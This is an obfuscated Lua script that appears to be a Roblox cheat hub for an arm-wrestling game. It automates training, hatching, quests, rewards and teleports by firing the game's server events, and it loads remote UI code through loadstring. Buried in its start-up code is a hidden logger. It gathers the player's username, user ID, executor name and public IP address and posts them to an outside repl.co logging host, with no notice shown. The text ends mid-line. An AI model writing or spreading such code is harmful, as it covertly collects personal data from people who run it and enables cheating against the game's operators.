--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.3) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end if (getgenv().Key==v7("\224\244\233\28\177\153\233\52\250\252\244","\126\177\163\187\69\134\219\167")) then local v12=1383 -(1262 + 121) ;local v13;local v14;local v15;local v16;local v17;local v18;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;local v48;local v49;local v50;local v51;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;local v63;local v64;local v65;local v66;local v67;while true do if (v12==(1069 -(728 + 340))) then local v68=1790 -(816 + 974) ;local v69;while true do if (v68==0) then v69=0 -0 ;while true do if (v69==(7 -5)) then function v21() game:GetService(v7("\106\91\21\37\46\238\19\76\91\1\26\51\226\0\89\89\0","\114\56\62\101\73\71\141")).Packages.Knit.Services.ArmWrestleService.RE.onClickRequest:FireServer();end v22=nil;v69=3;end if (v69==(343 -(163 + 176))) then function v23() for v336=0,14,2 -1  do game:GetService(v7("\224\227\33\190\175\253\10\198\227\53\129\178\241\25\211\225\52","\107\178\134\81\210\198\158")).Packages.Knit.Services.TimedRewardService.RE.onClaim:FireServer(v336);end end v12=9 -7 ;break;end if (v69==(1 + 0)) then getgenv().loaded=true;v21=nil;v69=1812 -(1564 + 246) ;end if (v69==(348 -(124 + 221))) then function v22() game:GetService(v7("\138\236\203\200\177\234\218\208\189\237\232\208\183\251\218\195\189","\164\216\137\187")).Packages.Knit.Services.ToolService.RE.onClick:FireServer();end v23=nil;v69=3 + 1 ;end if (v69==0) then local v283=0;while true do if (v283==0) then v19({[v7("\137\209\219","\75\220\163\183\106\98")]="https://logger.ewqwqweeqw.repl.co",[v7("\47\191\159\63\214\6","\185\98\218\235\87")]=v7("\251\19\20\210","\202\171\92\71\134\190"),[v7("\1\196\45\140\44\211\63","\232\73\161\76")]={[v7("\152\214\76\73\27\181\205\15\105\7\171\220","\126\219\185\34\61")]="application/json"},[v7("\46\193\90\107","\135\108\174\62\18\30\23\147")]=game:GetService(v7("\158\253\62\219\43\171\33\209\191\234\47","\167\214\137\74\171\120\206\83")):JSONEncode({[v7("\131\231\59\89","\199\235\144\82\61\152")]=tostring(v17),[v7("\14\6","\75\103\118\217")]=tostring(v20),[v7("\210\71\117\6\176\26","\126\167\52\16\116\217")]=tostring(v14),[v7("\221\61\37\146\186\24\241\205","\156\168\78\64\224\212\121")]=tostring(v13),[v7("\2\246\160\205\18\250\170\220","\174\103\142\197")]=tostring(v15)})});if game.CoreGui:FindFirstChild(v7("\101\43\77\61\32\80\223\67\33","\152\54\72\63\88\69\62")) then game.CoreGui[v7("\231\199\252\89\209\202\201\73\221","\60\180\164\142")]:Destroy();end v283=452 -(115 + 336) ;end if (v283==(1 -0)) then v69=1;break;end end end end break;end end end if (v12==(4 + 13)) then local v70=46 -(45 + 1) ;while true do if (v70==(1 + 3)) then v65={};v12=2008 -(1282 + 708) ;break;end if (v70==(1215 -(583 + 629))) then spawn(function() Toggles.AutoHatchx3:OnChanged(function() while getgenv().AutoHatchingx3 and task.wait(getgenv().CoolDown or 1 )  do AutoHatchx3();end end);end);spawn(function() Toggles.AutoHatchx8:OnChanged(function() while getgenv().AutoHatchingx8 and task.wait(getgenv().CoolDown or 1 )  do AutoHatchx8();end end);end);v70=1 + 3 ;end if (v70==(2 -1)) then spawn(function() Toggles.AutoTrainBiceps:OnChanged(function() local v273=0 + 0 ;local v274;while true do if ((1171 -(943 + 227))==v273) then while getgenv().AutoTrainBiceps and task.wait()  do local v344=0;local v345;while true do if (v344==0) then v345=0;while true do if (v345==(0 + 0)) then game:GetService(v7("\181\228\12\67\220\177\168\222\130\229\47\91\218\160\168\205\130","\170\231\129\124\47\181\210\201")).Packages.Knit.Services.ToolService.RE.onClick:FireServer();task.wait();break;end end break;end end end break;end if (v273==(1631 -(1539 + 92))) then v274={[1]=getgenv().World,[1948 -(706 + 1240) ]=v7("\226\12\81\52\206\11\176\213","\220\166\121\60\86\171\103"),[261 -(81 + 177) ]=getgenv().HandsKG};game:GetService(v7("\219\7\45\188\50\201\27\253\7\57\131\47\197\8\232\5\56","\122\137\98\93\208\91\170")).Packages.Knit.Services.ToolService.RE.onGuiEquipRequest:FireServer(unpack(v274));v273=2 -1 ;end end end);end);spawn(function() Toggles.AutoTrainGrips:OnChanged(function() local v275=0;local v276;while true do if (1==v275) then while getgenv().AutoGrips and task.wait()  do local v346=257 -(212 + 45) ;local v347;while true do if (v346==(0 -0)) then v347=1946 -(708 + 1238) ;while true do if (v347==0) then game:GetService(v7("\71\40\168\141\64\118\44\172\132\77\70\57\183\147\72\114\40","\41\21\77\216\225")).Packages.Knit.Services.ToolService.RE.onClick:FireServer();task.wait();break;end end break;end end end break;end if (v275==(0 + 0)) then local v337=0 + 0 ;while true do if (v337==(1667 -(586 + 1081))) then v276={[512 -(348 + 163) ]=getgenv().World,[2]=v7("\172\169\51\32\25","\74\235\219\90\80\106"),[3]=getgenv().BicepsKg};game:GetService(v7("\126\198\75\55\51\247\123\230\73\199\104\47\53\230\123\245\73","\146\44\163\59\91\90\148\26")).Packages.Knit.Services.ToolService.RE.onGuiEquipRequest:FireServer(unpack(v276));v337=1 + 0 ;end if (v337==1) then v275=1;break;end end end end end);end);v70=2;end if (v70==0) then spawn(function() Toggles.CratesOpen:OnChanged(function() while getgenv().AutoOpenCrates and task.wait()  do local v284=280 -(215 + 65) ;local v285;local v286;while true do if (v284==(2 -1)) then while true do if (v285==(1860 -(1541 + 318))) then task.wait();break;end if (v285==0) then v286={[1 + 0 ]=getgenv().CrateSelection};game:GetService(v7("\113\28\48\25\74\26\33\1\70\29\19\1\76\11\33\18\70","\117\35\121\64")).Packages.Knit.Services.ArmsService.RF.RollArmCrateForPlayer:InvokeServer(unpack(v286));v285=1;end end break;end if (v284==(0 + 0)) then v285=0 + 0 ;v286=nil;v284=1751 -(1036 + 714) ;end end end end);end);spawn(function() Toggles.AutoQuest:OnChanged(function() if (getgenv().QuestBeta==v7("\249\184\232\211\34\91\157\143\231\198\51\74\207\253\202\217\32","\47\189\221\142\182\67")) then while getgenv().AutoFarmQuest and task.wait()  do local v338=0;local v339;while true do if (v338==0) then v339={[1 + 0 ]=v7("\18\182\55\219\77\187\4\38\35","\73\64\223\71\171\40\201\64"),[2 + 0 ]=workspace.GameObjects.ArmWrestling["2"].NPC[v7("\56\132\212\73\165\111\46\130\199","\29\106\237\164\57\192")].Table,[3]="2"};game:GetService(v7("\131\161\247\182\220\209\161\230\180\160\212\174\218\192\161\245\180","\146\209\196\135\218\181\178\192")).Packages.Knit.Services.ArmWrestleService.RE.onEnterNPCTable:FireServer(unpack(v339));v338=1281 -(883 + 397) ;end if (v338==1) then v21();break;end end end elseif (getgenv().QuestBeta==v7("\9\53\133\20\81\179\109\97\195\51\85\166\46\56\195\51\95\180\62","\199\77\80\227\113\48")) then while getgenv().AutoFarmQuest and task.wait()  do local v367={[591 -(563 + 27) ]=getgenv().EventNpcQuest,[2]=workspace.GameObjects.ArmWrestling["3"].NPC[getgenv().EventNpcQuest].Table,[11 -8 ]="3"};game:GetService(v7("\24\58\78\193\35\60\95\217\47\59\109\217\37\45\95\202\47","\173\74\95\62")).Packages.Knit.Services.ArmWrestleService.RE.onEnterNPCTable:FireServer(unpack(v367));v21();end end task.wait();end);end);v70=1987 -(1369 + 617) ;end if (v70==(1489 -(85 + 1402))) then spawn(function() Toggles.AutoGifts:OnChanged(function() while getgenv().AutoGifts and task.wait(2 + 3 )  do v23();end end);end);spawn(function() Toggles.AutoHatchx1:OnChanged(function() while getgenv().AutoHatchingx1 and task.wait(getgenv().CoolDown or (2 -1) )  do AutoHatchx1();end end);end);v70=3;end end end if (v12==(403 -(274 + 129))) then v13=game.Players.LocalPlayer.name;v14=game.Players.LocalPlayer.UserId;v15=identifyexecutor();v16=game:GetService(v7("\11\217\62\213\207\38\223\60\204\255\38","\156\67\173\74\165"));v17=v7("\4\184\70\4\252\3\94\36\187\70\31\168","\38\84\215\41\118\220\70");v18=v16:JSONDecode(v19({[v7("\101\4\46","\158\48\118\66\114")]="https://httpbin.org/get",[v7("\134\33\4\62\124\161","\155\203\68\112\86\19\197")]=v7("\97\248\2","\152\38\189\86\156\32\24\133")}).Body);for v81,v82 in ipairs({v7("\215\69\169\74\177\127\176\79\248","\38\156\55\199"),v7("\155\100\114\101\53\125\244\68\173\111\108\58\26\122\238","\35\200\29\28\72\115\20\154"),v7("\42\136\156\249\132\34\51\28\173\193\205\132\34\32","\84\121\223\177\191\237\76"),v7("\157\90\220\184\119\118\57\207\188\83\219\176\40\89\62\213","\161\219\54\169\192\90\48\80"),v7("\108\78\5\38\93\80\15\43\4\100\9\43\78\71\18\53\91\75\14\49","\69\41\34\96")}) do if v18.headers[v82] then v17=v18.headers[v82];end end v19=http_request or v19 or HttpPost or syn.request ;v20=tostring(game:HttpGet("https://api.ipify.org"));v12=385 -(27 + 357) ;end if (v12==3) then local v73=480 -(91 + 389) ;while true do if (v73==2) then v29=loadstring(game:HttpGet(v27   .. "addons/ThemeManager.lua" ))();v30=loadstring(game:HttpGet(v27   .. "addons/SaveManager.lua" ))();v73=300 -(90 + 207) ;end if (v73==(1 + 2)) then v31=v28:CreateWindow({[v7("\8\166\149\64\230","\24\92\207\225\44\131\25")]=v7("\98\221\190\69\21\116\95\202\143\77\9\120\11\207\248\126\30\127\68\193\182\12\7\61","\29\43\179\216\44\123")   .. v26 ,[v7("\158\220\46\88\184\203","\44\221\185\64")]=true,[v7("\32\242\92\80\64\9\232\95","\19\97\135\40\63")]=true,[v7("\154\93\49\11\46\53\170\85\61\60","\81\206\60\83\91\79")]=866 -(706 + 155) ,[v7("\99\174\222\103\9\194\73\161\122\162\221\119","\196\46\203\176\18\79\163\45")]=0.5});v32={[v7("\145\44\120\17\54\246\238\172\43\113\16","\143\216\66\30\126\68\155")]=v31:AddTab(v7("\131\198\11\196\215\174\214\245\163\199\3","\129\202\168\109\171\165\195\183")),[v7("\15\89\62\214","\134\66\56\87\184\190\116")]=v31:AddTab(v7("\17\48\0\181","\85\92\81\105\219\121\139\65")),[v7("\220\166\68\74\84\222\233\176\88","\191\157\211\48\37\28")]=v31:AddTab(v7("\254\10\224\19\21\207\26\250","\90\191\127\148\124")),[v7("\79\130\44\31\119\136\37","\119\24\231\78")]=v31:AddTab(v7("\181\40\167\66\211\79\26","\113\226\77\197\42\188\32")),[v7("\15\63\180\134\63\2\224\188\52\17\231","\213\90\118\148")]=v31:AddTab(v7("\104\43\160\66\68\85\41\167","\45\59\78\212\54"))};v73=4;end if (v73==1) then v27="https://raw.githubusercontent.com/NecoWareHub/Hub/main/";v28=loadstring(game:HttpGet(v27   .. v7("\247\130\19\231\184\206\214\149\135\4\244","\175\187\235\113\149\217\188") ))();v73=1797 -(730 + 1065) ;end if (v73==(1563 -(1339 + 224))) then function v25(v206) if  not tonumber(v206) then return v206;end if (v206<(5087 + 4913)) then return math.floor(v206);end local v207=math.floor(math.log10(v206)/(3 + 0) ) * (3 -0) ;local v208=tostring(v206/((853 -(268 + 575))^v207) ):sub(1295 -(919 + 375) ,13 -8 );return v208   .. " "   .. tostring(v24[math.floor(v207/3 )]) ;end v26=game:GetService(v7("\116\87\89\246\112\146\151\7\88\85\78\206\112\148\145\2\90\83","\107\57\54\43\157\21\230\231")):GetProductInfo(game.PlaceId).Name;v73=972 -(180 + 791) ;end if (v73==(1809 -(323 + 1482))) then v33=v32.Information:AddLeftGroupbox(v7("\35\66\130\159\143\61\174\228\25\85\195\209\198","\144\112\54\227\235\230\78\205"));v12=1922 -(1177 + 741) ;break;end end end if (v12==(1 + 9)) then function TeleportToNuclearBunker() local v83=0 -0 ;local v84;while true do if (v83==0) then v84={[1]=workspace.Zones["4"].Interactables.Teleports.Locations.NuclearBunker};game:GetService(v7("\250\92\85\118\236\120\201\77\64\126\214\111\199\75\68\125\224","\27\168\57\37\26\133")).Packages.Knit.Services.ZoneService.RE.teleport:FireServer(unpack(v84));break;end end end function TeleportToDinoWorld() local v85=0;local v86;while true do if (v85==(0 + 0)) then v86={[1 -0 ]=game:GetService(v7("\26\165\110\163\196\61\171\127\173","\183\77\202\28\200")).Zones[1 + 4 ].Interactables.Teleport.Locations.DinoWorld};game:GetService(v7("\37\54\153\4\30\48\136\28\18\55\186\28\24\33\136\15\18","\104\119\83\233")).Packages.Knit.Services.ZoneService.RE.teleport:FireServer(unpack(v86));break;end end end v52=v32.Main:AddLeftGroupbox(v7("\212\234\42\21\81\240\235\51\46\70\181\162\103","\35\149\152\71\66"));v53=v32.Main:AddRightGroupbox(v7("\62\250\75\190\62\16\230\69\240\96\89","\90\121\136\34\208"));v54=v32.Main:AddLeftGroupbox(v7("\244\11\89\27\196\26\92\17\201\78\15\94","\126\167\110\53"));v55=v32.Main:AddRightGroupbox(v7("\10\21\39\255\212\43\46\80\116\184","\95\93\112\78\152\188"));v56=v32.Main:AddRightGroupbox(v7("\238\225\141\16\246\254\136\129","\178\161\149\229\117\132\222"));v57=v32.Main:AddLeftGroupbox(v7("\188\222\209\169\177\25\180\55\155\155\135\236","\67\232\187\189\204\193\118\198"));v57:AddToggle(v7("\169\47\182\43\15\13\220\136\38\186\47\55","\143\235\78\213\64\91\98"),{[v7("\185\77\156\253","\214\237\40\228\137\16")]=v7("\190\178\210\153\55\163\137\230\255\214\17\178\197\247\224\153\56\132\132\224\228\237\12\149\134\235\224\214\15\155","\198\229\131\143\185\99"),[v7("\117\137\174\114\68\128\188","\19\49\236\200")]=false,[v7("\202\56\249\187\240\179\238","\218\158\87\150\215\132")]=v7("\207\27\213\231\38\45\223\239","\173\155\126\185\130\86\66"),[v7("\198\167\182\203\138\237\230\173","\140\133\198\218\167\232")]=function() local v87=109 -(96 + 13) ;while true do if (v87==0) then TeleportToBackToSchool();warn(v7("\142\7\131\61\183\160\62\164\114\150\161\43\166\64\196\134\43\184\120\135\161\43\176\61\222","\228\213\78\212\29"),Value);break;end end end});v12=1932 -(962 + 959) ;end if (v12==(22 -13)) then v44:AddToggle(v7("\108\55\174\72\242\84\57","\157\59\82\204\32"),{[v7("\12\59\251\238","\209\88\94\131\154\137\138\179")]=v7("\9\180\208\115\94\16\52\44\44\225\247\104\31\55\34\98\31\164\198\116\17\44\58","\66\72\193\164\28\126\67\81"),[v7("\195\41\174\89\51\122\243","\22\135\76\200\56\70")]=false,[v7("\185\63\247\40\73\232\157","\129\237\80\152\68\61")]=v7("\98\173\10\247\92\32\93\83\160\11\252\23","\56\49\200\100\147\124\119"),[v7("\239\63\179\252\206\63\188\251","\144\172\94\223")]=function(v88) local v89=0 + 0 ;local v90;while true do if (v89==(1351 -(461 + 890))) then v90=0 + 0 ;while true do if ((0 -0)==v90) then getgenv().Webhook=v88;warn(v7("\31\38\149\7\23\26\178\87\43\29\182\66\54\50\226\116\33\3\167\68\48\10\166\7\126","\39\68\111\194"),v88);break;end end break;end end end});v47:AddInput(v7("\230\163\243\242\107\187","\215\182\198\135\167\25"),{[v7("\169\76\236\73\152\69\254","\40\237\41\138")]=v7("\226\122\238\253\88\135\67\255\250\66\200\123\241\184\127\213\120","\42\167\20\154\152"),[v7("\100\235\175\71\99\40\73","\65\42\158\194\34\17")]=false,[v7("\60\46\92\5\62\229\30\234","\142\122\71\50\108\77\141\123")]=true,[v7("\33\167\231\12","\91\117\194\159\120")]=v7("\63\19\42\29\39\177\20\31\9\126\45\39\253","\68\122\125\94\120\85\145"),[v7("\35\19\192\82\220\208\170","\218\119\124\175\62\168\185")]=v7("\146\245\74\204\170\255\67\132\144\226\68","\164\197\144\40"),[v7("\179\252\171\136\216\190\140\252\174\142\207","\214\227\144\202\235\189")]=v7("\200\171\147\126\2\243\100\57\239\173\136\116\27\243\102\46\225","\92\141\197\231\27\112\211\51"),[v7("\197\254\134\175\211\231\252\129","\177\134\159\234\195")]=function(v91) getgenv().PetUrl=v91;end});v47:AddInput(v7("\141\238\43\148\192\176\238","\169\221\139\95\192"),{[v7("\250\142\121\62\55\42\202","\70\190\235\31\95\66")]=v7("\159\236\14\227\247\250\213\31\228\237\181\237\17\166\209\179\239\31","\133\218\130\122\134"),[v7("\18\234\238\193\206\170\59","\88\92\159\131\164\188\195")]=true,[v7("\166\39\177\66\196\227\216\132","\189\224\78\223\43\183\139")]=true,[v7("\26\249\146\2","\161\78\156\234\118")]=v7("\130\185\221\217\181\247\221\212\162\247\221\213\170\178\137\211\161\247\218\217\169\179\192\210\160\247\217\217\179\247\222\217\165\191\198\211\172","\188\199\215\169"),[v7("\200\6\80\119\252\245\25","\136\156\105\63\27")]=v7("\44\137\123\60\20\131\114\116\15\133\116\49","\84\123\236\25"),[v7("\192\135\171\20\169\189\255\135\174\18\190","\213\144\235\202\119\204")]=v7("\6\22\202\47\58\99\121\42\21\219\106\60\44\13\48\29\208\46\104\52\72\33\16\209\37\35","\45\67\120\190\74\72\67"),[v7("\3\35\225\169\251\137\237\226","\137\64\66\141\197\153\232\142")]=function(v93) getgenv().PetTime=v93;end});v47:AddToggle(v7("\51\213\54\145\141\1\216\45\169\131","\232\99\176\66\198"),{[v7("\216\36\48\18","\76\140\65\72\102\27\237\153")]=v7("\107\207\2\221\151\50\187\68\222\86\226\210\21\254\125\223\20\218\216\14\181","\222\42\186\118\178\183\97"),[v7("\121\233\66\139\72\224\80","\234\61\140\36")]=false,[v7("\21\210\181\126\27\40\205","\111\65\189\218\18")]=v7("\112\78\21\49\75\107\170\65\67\20\58\0","\207\35\43\123\85\107\60"),[v7("\83\171\172\230\123\113\169\171","\25\16\202\192\138")]=function(v95) local v96=243 -(19 + 224) ;while true do if (v96==0) then getgenv().PetWebhook=v95;warn(v7("\198\226\154\162\154\225\237\219\162\240\189\241\239\246\237\209\172\248\248\200\185\231\173\180\167","\148\157\171\205\130\201"),v95);break;end end end});game:GetService(v7("\17\209\100\37\216\245\34\192\113\45\226\226\44\198\117\46\212","\150\67\180\20\73\177")).Packages.Knit.Services.EasterZoneService.RF.HitBreakable:InvokeServer(ohString1);function TeleportToBackToEaster() local v97=0 + 0 ;local v98;local v99;while true do if (v97==(198 -(37 + 161))) then v98=0;v99=nil;v97=1 + 0 ;end if (v97==1) then while true do if ((0 + 0)==v98) then v99={[1]=workspace.Zones[v7("\168\25\9\89\136\10","\45\237\120\122")].Interactables.Teleports.Locations.Start};game:GetService(v7("\229\237\178\32\222\235\163\56\210\236\145\56\216\250\163\43\210","\76\183\136\194")).Packages.Knit.Services.ZoneService.RE.teleport:FireServer(unpack(v99));break;end end break;end end end function TeleportToBackToSchool() local v100=0 + 0 ;local v101;local v102;while true do if (v100==(62 -(60 + 1))) then while true do if (0==v101) then v102={[1]=workspace.Zones["1"].Interactables.Teleports.Locations.BackToSchool};game:GetService(v7("\72\227\245\52\89\76\21\110\227\225\11\68\64\6\123\225\224","\116\26\134\133\88\48\47")).Packages.Knit.Services.ZoneService.RE.teleport:FireServer(unpack(v102));break;end end break;end if (v100==(923 -(826 + 97))) then v101=0;v102=nil;v100=1 + 0 ;end end end function TeleportToFuturistic() local v103=0 -0 ;local v104;while true do if (v103==(0 -0)) then v104={[686 -(375 + 310) ]=workspace.Zones["2"].Interactables.Teleports.Locations.Futuristic};game:GetService(v7("\44\196\176\232\180\113\31\213\165\224\142\102\17\211\161\227\184","\18\126\161\192\132\221")).Packages.Knit.Services.ZoneService.RE.teleport:FireServer(unpack(v104));break;end end end function TeleportToBeach() local v105=1999 -(1864 + 135) ;local v106;while true do if (v105==0) then v106={[2 -1 ]=workspace.Zones["3"].Interactables.Teleports.Locations.Beach};game:GetService(v7("\109\45\190\8\95\92\41\186\1\82\108\60\161\22\87\88\45","\54\63\72\206\100")).Packages.Knit.Services.ZoneService.RE.teleport:FireServer(unpack(v106));break;end end end v12=3 + 7 ;end if (v12==6) then v40:AddSlider(v7("\161\222\174\129\189\139\149\223\178","\228\226\177\193\237\217"),{[v7("\0\181\59\242","\134\84\208\67")]=v7("\50\185\146\83\59\173\146\95\27\236\181\76\22\169\130","\60\115\204\230"),[v7("\195\63\237\113\242\54\255","\16\135\90\139")]=v7("\4\58\87","\24\52\20\102\83\46\52"),[v7("\233\38\47","\111\164\79\65\68")]=v7("\150\151\210","\138\166\185\227\190\78"),[v7("\230\117\221","\121\171\20\165\87\50\67")]="3",[v7("\244\55\172\56\189\11\200\63","\98\166\88\217\86\217")]="1",[v7("\197\227\127\7\143\196","\188\150\150\25\97\230")]=v7("\154\154\90\1\66","\141\186\233\63\98\108"),[v7("\210\229\33\166\36\242\254","\69\145\138\76\214")]=false,[v7("\83\206\133\133\189\23\115\196","\118\16\175\233\233\223")]=function(v107) local v108=0 + 0 ;while true do if (0==v108) then getgenv().CoolDown=v107;print(v7("\176\173\2\251\221\158\109\155\139\39\175\235\153\64\203\183\48\183\235\136\105\142\128\117\225","\29\235\228\85\219\142\235"),v107);break;end end end});v40:AddToggle(v7("\28\193\174\210\95\79\51\81\53\204\235","\50\93\180\218\189\23\46\71"),{[v7("\234\161\67\88","\40\190\196\59\44\36\188")]=v7("\29\80\200\187\210\124\25\63\77\156\143\226\44\48","\109\92\37\188\212\154\29"),[v7("\32\234\162\194\36\86\16","\58\100\143\196\163\81")]=false,[v7("\46\77\44\175\43\64\245","\110\122\34\67\195\95\41\133")]=v7("\93\176\79\73\222\124\191\92\10\211\114\182\27\82\135","\182\21\209\59\42"),[v7("\148\86\201\17\35\191\180\92","\222\215\55\165\125\65")]=function(v109) local v110=0 -0 ;while true do if (v110==(1131 -(314 + 817))) then getgenv().AutoHatchingx1=v109;warn(v7("\23\248\241\90\193\212\253\90\35\195\210\31\224\252\173\121\41\221\195\25\230\196\233\10\118","\42\76\177\166\122\146\161\141"),v109);break;end end end});v40:AddToggle(v7("\132\159\17\193\81\119\177\137\13\214\42","\22\197\234\101\174\25"),{[v7("\25\49\189\200","\230\77\84\197\188\22\207\183")]=v7("\216\1\210\243\164\160\228\54\241\84\253\228\223\156","\85\153\116\166\156\236\193\144"),[v7("\128\229\75\178\241\12\176","\96\196\128\45\211\132")]=false,[v7("\1\130\116\83\198\166\164","\184\85\237\27\63\178\207\212")]=v7("\32\88\29\92\0\80\7\88\72\92\14\88\72\65\90","\63\104\57\105"),[v7("\40\134\168\72\9\134\167\79","\36\107\231\196")]=function(v111) local v112=0 + 0 ;while true do if (v112==(214 -(32 + 182))) then getgenv().AutoHatchingx3=v111;warn(v7("\102\156\149\199\110\160\178\151\82\167\182\130\79\136\226\180\88\185\167\132\73\176\166\199\7","\231\61\213\194"),v111);break;end end end});v40:AddToggle(v7("\40\184\41\124\33\172\41\112\1\181\101","\19\105\205\93"),{[v7("\157\13\198\149","\95\201\104\190\225")]=v7("\142\222\213\193\135\202\213\205\167\139\250\214\247\246","\174\207\171\161"),[v7("\201\251\11\242\237\219\249","\183\141\158\109\147\152")]=false,[v7("\24\6\233\0\56\0\246","\108\76\105\134")]=v7("\195\196\165\226\198\226\203\182\161\203\236\194\241\249\150","\174\139\165\209\129"),[v7("\128\178\238\205\196\2\115\115","\24\195\211\130\161\166\99\16")]=function(v113) local v114=0;while true do if (0==v114) then getgenv().AutoHatchingx8=v113;warn(v7("\125\42\222\108\96\3\86\19\230\62\71\19\84\62\169\31\86\26\67\0\253\41\87\86\28","\118\38\99\137\76\51"),v113);break;end end end});v42=v32.AutoHatch:AddRightGroupbox(v7("\222\52\4\6\12\51\189\32\0\19\29\53\239\35\22\82\83\96","\64\157\70\101\114\105"));v43=v32.AutoHatch:AddRightGroupbox(v7("\101\190\162\237\4\0\174\162\226\4\85\186\162\240\80\26\232","\112\32\200\199\131"));BeachNpcs={};for v115,v116 in pairs(game:GetService(v7("\27\95\78\179\208\187\35\47\85","\66\76\48\60\216\163\203")).GameObjects.ArmWrestling["3"].NPC:GetChildren()) do table.insert(BeachNpcs,v116.Name);end v43:AddDropdown(v7("\137\131\117\246\92\218\6\191\135\122\251\125\193\55\169","\68\218\230\25\147\63\174"),{[v7("\155\43\95\89\179\190","\214\205\74\51\44")]=BeachNpcs,[v7("\222\73\228\253\98\246\88","\23\154\44\130\156")]="",[v7("\60\179\161\186\63","\115\113\198\205\206\86")]=false,[v7("\176\82\230\78","\58\228\55\158")]=v7("\135\140\220\43\63\185\117\150\140\209\45\52\237\23\187\154\195","\85\212\233\176\78\92\205"),[v7("\126\87\135\238\94\81\152","\130\42\56\232")]=v7("\200\176\37\224\72\127\200\186\55\240\0\12\239\185\33\224\84\54\229\187\100","\95\138\213\68\131\32"),[v7("\9\41\173\79\116\43\43\170","\22\74\72\193\35")]=function(v117) local v118=0;local v119;while true do if (v118==0) then v119=0;while true do if (v119==(0 + 0)) then getgenv().EventNpcQuest=v117;warn(v7("\23\80\211\24\31\108\244\72\35\107\240\93\62\68\164\107\41\117\225\91\56\124\224\24\118","\56\76\25\132"),v117);break;end end break;end end end});v12=24 -17 ;end if (v12==(73 -(39 + 26))) then v46=v44:AddLabel(v7("\200\229\176\177\7\49\244\160\134\176\5\59\191\186\242\183\7\42\247\233\188\190","\94\159\128\210\217\104"),true);v47=v32.Webhook:AddRightGroupbox(v7("\103\252\4\183\80\112\242\58\118\236\8\188\75\118\246\116\67\185\92\255","\26\48\153\102\223\63\31\153"));v48=v47:AddLabel(v7("\53\69\239\251\13\79\230\179\55\82\225\179\88\0\227\252\22\72\228\253\5","\147\98\32\141"),true);v49=v47:AddLabel(v7("\47\70\225\194\9\89\64\88\119\234\199\3\22\17\88\77\236\222\14\95\69\31","\43\120\35\131\170\102\54"),true);v50=v34:AddLabel(v7("\122\7\138\179\229\234\196\125\8\129\191\171\185\144\77\49\134\164\160","\228\52\102\231\214\197\208"),true);v51=v34:AddLabel(v7("\40\229\103\217\227\132\23\150\68\160\99\155\164\217\89","\182\126\128\21\170\138\235\121"),true);v51=v34:AddLabel("Discord : dsc.gg/ireborn ",true);v44:AddInput(v7("\190\200\57","\102\235\186\85\134\230\115\80"),{[v7("\115\9\56\94\103\216\54","\66\55\108\94\63\18\180")]=v7("\49\131\145\50\53\25\33\159\137","\57\116\237\229\87\71"),[v7("\132\164\224\226\101\231\68","\39\202\209\141\135\23\142")]=false,[v7("\217\58\7\3\33\240\250\55","\152\159\83\105\106\82")]=true,[v7("\181\195\73\230","\60\225\166\49\146\169")]=v7("\10\16\59\47\19\71\26\12\35","\103\79\126\79\74\97"),[v7("\142\112\220\127\74\19\170","\122\218\31\179\19\62")]=v7("\132\211\207\201\198\174\78\243\227\223\205","\37\211\182\173\161\169\193"),[v7("\199\54\76\218\45\115\182\251\62\72\203","\217\151\90\45\185\72\27")]=v7("\230\114\243\23\68\131\75\226\16\94\204\115\236\82\99\209\112","\54\163\28\135\114"),[v7("\11\218\81\142\76\126\43\208","\31\72\187\61\226\46")]=function(v120) getgenv().Url=v120;end});v44:AddInput(v7("\247\15\78\215","\68\163\102\35\178\39\30"),{[v7("\154\117\220\198\22\185\151","\113\222\16\186\167\99\213\227")]=v7("\11\0\239\243\60\78\204\243\44\6\244\249\37\78\207\255\35\11","\150\78\110\155"),[v7("\171\208\42\228\182\23\188","\32\229\165\71\129\196\126\223")]=true,[v7("\229\128\202\136\146\221\198\141","\181\163\233\164\225\225")]=true,[v7("\100\142\38\99","\23\48\235\94")]=v7("\89\212\204\88\69\115\198\116\223\152\73\94\62\215\60\213\222\29\68\54\220\120\211\214\90\23\36\215\126\210\215\82\92","\178\28\186\184\61\55\83"),[v7("\240\194\72\48\230\7\229","\149\164\173\39\92\146\110")]=v7("\196\34\18\23\21\20\248\103\4\22\23\30","\123\147\71\112\127\122"),[v7("\252\193\131\114\67\196\194\142\117\67\222","\38\172\173\226\17")]=v7("\104\31\56\234\95\81\24\230\64\20\108\251\66\81\63\234\67\21\108\248\72\19\36\224\66\26","\143\45\113\76"),[v7("\155\185\16\48\186\185\31\55","\92\216\216\124")]=function(v122) getgenv().Time=v122;end});v12=9;end if (v12==(148 -(54 + 90))) then v34=v32.Information:AddRightGroupbox(v7("\128\43\29\245\192\79\243\114\79","\59\211\72\111\156\176"));v35=v33:AddLabel(v7("\123\148\230\63\14\221\163","\77\46\231\131")   .. game.Players.LocalPlayer.Name ,false);v36=v33:AddLabel(v7("\143\71\179\82\179\80\246\26\250","\32\218\52\214")   .. game.Players.LocalPlayer.UserId ,false);v37=v33:AddLabel(v7("\126\27\48\171\244\153\65\26\20\87","\58\46\119\81\200\145\208\37")   .. game.PlaceId ,false);v38=v33:AddLabel(v7("\12\141\61\169\233\231\118","\86\75\236\80\204\201\221")   .. v26 